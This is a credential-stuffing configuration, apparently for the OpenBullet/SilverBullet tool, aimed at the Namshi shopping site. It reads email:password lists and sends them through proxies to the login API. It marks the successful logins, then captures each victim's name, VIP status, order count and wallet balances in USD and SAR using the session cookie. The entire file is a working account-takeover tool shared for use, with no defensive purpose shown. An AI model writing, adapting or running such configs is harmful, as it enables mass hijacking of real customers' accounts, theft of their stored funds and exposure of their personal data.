[SETTINGS]
{
  "Name": "Namshi shopping",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2022-02-26T11:45:09.0732121+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "🔥 YASHVIRGAMING#7131 🔥",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Namshi shopping",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://login.namshi.com/_svc/jerry/v2/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: login.namshi.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "N-Locale: ar_SA" 
  HEADER "N-Device: mobile" 
  HEADER "Origin: https://login.namshi.com" 
  HEADER "Content-Length: 55" 
  HEADER "Connection: keep-alive" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "كلمة السر / البريد الالكتروني الذي تم إدخاله غير صحيح" 
  KEYCHAIN Success OR 
    KEY "token\":\"" 

#first_name PARSE "<SOURCE>" LR "firstName\":\"" "\"" CreateEmpty=FALSE -> CAP "First_Name" 

#last_name PARSE "<SOURCE>" LR "lastName\":\"" "\"" CreateEmpty=FALSE -> CAP "Last_Name" 

#isVip PARSE "<SOURCE>" LR "isVip\":" "," -> VAR "vip" 

FUNCTION Translate 
  KEY "0" VALUE "False ❌" 
  KEY "1" VALUE "True ✅" 
  "<vip>" -> CAP "Vip" 

#ID PARSE "<SOURCE>" JSON "idCustomer" -> VAR "ID" 

#I PARSE "<COOKIES(identity)>" LR "" "" -> VAR "I" 

#req REQUEST GET "https://my.namshi.com/_svc/customer-info/v2/customers/<ID>/orders" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Order PARSE "<SOURCE>" JSON "totalCount" CreateEmpty=FALSE -> CAP "Total Order" 

#req2 REQUEST GET "https://my.namshi.com/_svc/customer-info/v2/wallet?limit=10&page=undefined" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "cookie: identity=<I>" 

#b PARSE "<SOURCE>" LR "{\"currency\":\"USD\",\"value\":" "}" -> VAR "U" "USD Balances " "" 

#s PARSE "<SOURCE>" LR "\"currency\":\"SAR\",\"value\":" "}" -> VAR "S" "SAR Balances " "" 

#Balance FUNCTION Constant "<U> , <S>" -> CAP "Balances" 

FUNCTION Constant "🔥 YASHVIRGAMING#7131 🔥" -> CAP "Config By" 

